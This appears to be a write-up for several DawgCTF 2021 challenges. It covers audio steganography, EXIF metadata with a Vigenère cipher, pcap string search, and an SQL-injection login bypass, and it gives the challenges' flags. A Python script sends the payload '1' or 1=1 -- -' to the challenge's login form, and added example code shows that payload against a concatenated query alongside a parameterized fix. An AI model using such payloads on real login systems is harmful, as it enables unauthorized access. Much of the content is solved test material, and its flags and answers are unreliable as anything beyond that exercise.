Comment : Ḑ̶͙̀á̴̡̳͈̏ẃ̸͇͚g̸̭̣̱͂C̵̹̆̂Ṱ̴̡͍̀F̴̻͚͐̿̄{̴̟̃̀̐w̵̺̻͒̔͋h̴̭͛0̵͍̤͒͆͝_̷̟̈́͘̚d̶͙͕͜͝0̶͕͚͎̏̚w̸̦͙̃̽ǹ̷͙͚l̶̛̜̈́0̴̧̱͓͝a̶̘̮͚̿̈́ď̷̡̬́ŝ̴̢͔̌͝ͅ_̶̬̺͛̎̈́ͅm̵̳͗ű̶͎̊s̷̰̀̄͆1̸͕͖̈́c̶͔͆_̷̢̧̔̉̚â̵̙̔ǹ̵̖̦͈̇̿ỵ̴̬̓̔m̸̛͉̩̑0̸̮͓̏̊̀r̴͇͕̈́̄̉3̶̙̭͎͋̚͝?̴͔̟̩͊͛}̴̤̲͂͜
Date/Time Original : 2015
Duration : 0:03:04 (approx)
Flag : DawgCTF{wh0_d0wnl0ads_mus1c_anym0re?}
Deserted Island Toolkit
points 150
Description
What would a drunken sailor do? (Wrap the output in DawgCTF{ })
Author: Eyeclept
Solution
We get a dawgTunes.iso, which we can extract:
7z x dawgTunes.iso
giving us two files: a dawgTunes.cdda and a checksum.
From here we get to know that cdda files are audio files that store audio in the AIFF format…
This file is, however, unrecognized when running file on it, so it's not readable…
Since it's an audio file, we can convert it to an uncompressed format, '.wav', using sox:
sox dawgTunes.cdda dawgTunes.wav
Listening to it, we can guess that it's Morse code.
We decoded it using https://morsecode.world/international/decoder/audio-decoder-adaptive.html
After decoding, we make some corrections and we get the flag.
Flag : DawgCTF{SISNOTTHEAN5W3R}
Moses
points 175
Description
If you can find a way to part the waves, you might find something on the seafloor.
Author: Noodle
Solution
We are given two .flac audio files.
Running diff says they are different files, despite having similar properties.
So again I opened the files in Sonic Visualiser and exported the spectrogram image for each audio file.
The two images are almost identical…
Using stegsolve's image combiner and navigating through, we get the flag.

Flag : DawgCTF{sunk3n_tr3asur3s}
FWN (Forensics/Web/Network)
Just A Comment
points 50
Description
Just a comment, we love our people here at ClearEdge!
Author: Clearedge
Solution
Running strings on the file reveals the flag:
┌─[✗]─[user@parrot]─[~/Desktop/CTFs/DawgCTF]
└──╼ $strings justacomment.pcapng | grep DawgCTF
DawgCTF{w3 h34r7 0ur 1r4d 734m}
An alternative would be to use Wireshark or an equivalent.
Flag : DawgCTF{w3 h34r7 0ur 1r4d 734m}
These Ladies Paved Your Way
points 150
Description
Per womenintech.co.uk, these 10 women paved your way as technologists. One of them holds more than 100 issued patents and is known for writing understandable textbooks about network security protocols. What other secrets does she hold?
Author: Clearedge
Solution
We get 10 images.
Running exiftool reveals an interesting find in radia_perlman.jpg:
ExifTool Version Number : 11.16
File Name : radia_perlman.jpg
Directory : .
File Size : 10 kB
File Modification Date/Time : 2021:04:23 23:11:46+00:00
File Access Date/Time : 2021:05:10 11:10:32+00:00
File Inode Change Date/Time : 2021:05:10 11:10:20+00:00
File Permissions : rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Current IPTC Digest : 8d370a1f7871e76616c0f06987707b84
Credit : U3Bhbm5pbmdUcmVlVmlnCg==
Application Record Version : 4
Keywords : VpwtPBS{r0m5 0W t4x3IB5}
Comment : CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 80.
Image Width : 227
Image Height : 244
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 227x244
Megapixels : 0.055
Decoding U3Bhbm5pbmdUcmVlVmlnCg== gives us SpanningTreeVig,
which is the key to the Vigenère cipher VpwtPBS{r0m5 0W t4x3IB5}
Flag : DawgCTF{l0t5 0F p4t3NT5}
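The two decoding steps above as an added example (not part of the original writeup): the Credit value is base64, and the Keywords value is Vigenère-decrypted with the decoded key. The function names are hypothetical; the assumed convention is that case is preserved and the key advances only on letters, so digits, spaces and braces pass through unchanged.

```python
import base64

# Values copied from the exiftool output above.
CREDIT = "U3Bhbm5pbmdUcmVlVmlnCg=="
KEYWORDS = "VpwtPBS{r0m5 0W t4x3IB5}"


def vigenere_decrypt(ciphertext, key):
    """Vigenère decryption that keeps case and passes non-letters through.

    The key position advances only when a letter is consumed; with this
    convention the Keywords value decrypts to the flag.
    """
    shifts = [ord(k) - ord("a") for k in key.lower()
              if k.isascii() and k.isalpha()]
    if not shifts:
        raise ValueError("key must contain at least one ASCII letter")
    out, i = [], 0
    for ch in ciphertext:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            shift = shifts[i % len(shifts)]
            out.append(chr((ord(ch) - base - shift) % 26 + base))
            i += 1
        else:
            out.append(ch)          # digits, spaces, braces are not enciphered
    return "".join(out)


def recover_flag(credit_b64, keywords):
    """Decode the base64 Credit field and use it as the Vigenère key."""
    # The decoded bytes end with a newline, so strip before using as key.
    key = base64.b64decode(credit_b64).decode("ascii").strip()
    return key, vigenere_decrypt(keywords, key)


if __name__ == "__main__":
    print(recover_flag(CREDIT, KEYWORDS))
```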
Dr. Hrabowski’s Great Adventure
points 150
Description
President Freeman Hrabowski is having a relaxing evening in Downtown Baltimore. But he forgot his password to give all UMBC students an A in all their classes this semester! Find a way to log in and help him out.
(If you get an SSL error, try a different browser)
Author: Clearedge
Solution
Initial attempts to open the link failed in all my browsers,
so I decided to use curl:
┌─[skoki@parrot]─[~/Desktop/CTFs/DawgCTF/Women/images]
└──╼ $curl -i http://umbccd.io:6100
HTTP/1.1 200 OK
Date: Tue, 11 May 2021 10:24:07 GMT
Server: Apache/2.4.38 (Debian)
X-Powered-By: PHP/7.4.16
Set-Cookie: PHPSESSID=ed76bcb3c7d58c8997eb16b9090fc0d2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1072
Content-Type: text/html; charset=UTF-8

-----snip------
 <em></em> <form action="/" method="POST">
  <div class="form-group">
   <label for="username">Username</label>
   <input type="text" class="form-control" name="username" id="username" placeholder="Username" required>
  </div>
  <div class="form-group">
   <label for="password">Password</label>
   <input type="password" class="form-control" name="password" id="password" placeholder="Password" required>
  </div>
  <input type="submit" class="btn btn-primary" id="submit" value="Log In"></input>
----snip-----
The important part was this login form, which we decided to test for an SQLi login bypass.
We created a simple Python script:
import requests

# Challenge endpoint
url = "http://umbccd.io:6100"

# Login form fields; the username carries the SQLi login-bypass test string
data = {
    "username": "1' or 1=1 -- -",
    "password": "lool"
}

res = requests.post(url, data=data)
print(res.text)
in the response we get our flag
$ python final.py

<!DOCTYPE html>
<head>
 <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous">
 <link rel="stylesheet" href="ourStyles.css">
</head>
<body>
 <nav class="navbar navbar-expand-md navbar-dark bg-dark mb-4">
  <a class="navbar-brand" href="#">
   UMBC Grades Server
  </a>
  <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarCollapse" aria-controls="navbarCollapse" aria-expanded="false" aria-label="Toggle navigation">
   <span class="navbar-toggler-icon"></span>
  </button>
 </nav>

 <main role="main" class="container">
  <h1>Welcome, President Hrabowski</h1>
  <p class="lead">Click the button below to change all students' grades to an A</p>
  <button type="button" class="btn-lg btn-danger centered" onClick="changeGrades()">DANGER: All students will get As for the semester</button>
  <img src="trueGrit.jpg" class="centered" id="trueGrit" name="DawgCTF{WeLoveTrueGrit}" style="display:none;">
 </main>

 <script>
  function changeGrades() {
   document.getElementById('trueGrit').style.display='block';
  }
 </script>
</body>
Flag : DawgCTF{WeLoveTrueGrit}
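Why the username 1' or 1=1 -- - gets past the login check, and the fix, as an added example that is not the challenge's code: the server's query is not shown in this writeup, so the SQLite table, the stored row and both login functions below are hypothetical stand-ins. Only the two form values come from the script above.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the login backend (schema is hypothetical)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Constructed row; a real application would store a password hash.
    db.execute("INSERT INTO users VALUES ('hrabowski', 'constructed-secret')")
    return db


def login_concatenated(db, username, password):
    """Vulnerable: user input becomes part of the SQL text."""
    query = ("SELECT username FROM users WHERE username = '%s' "
             "AND password = '%s'" % (username, password))
    # With the payload the WHERE clause becomes: username = '1' or 1=1
    # and everything after "--" (the password check) is a comment.
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(db, username, password):
    """Hardened: input is bound as data and never parsed as SQL."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = db.execute(query, (username, password)).fetchone()
    return row[0] if row else None


# The exact form values sent by the writeup's script.
PAYLOAD_USER = "1' or 1=1 -- -"
PAYLOAD_PASS = "lool"

if __name__ == "__main__":
    db = make_db()
    print("concatenated :", login_concatenated(db, PAYLOAD_USER, PAYLOAD_PASS))
    print("parameterized:", login_parameterized(db, PAYLOAD_USER, PAYLOAD_PASS))
```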
That’s all for now, thanks for reading.
For any corrections or suggestions, kindly reach out to k0imet_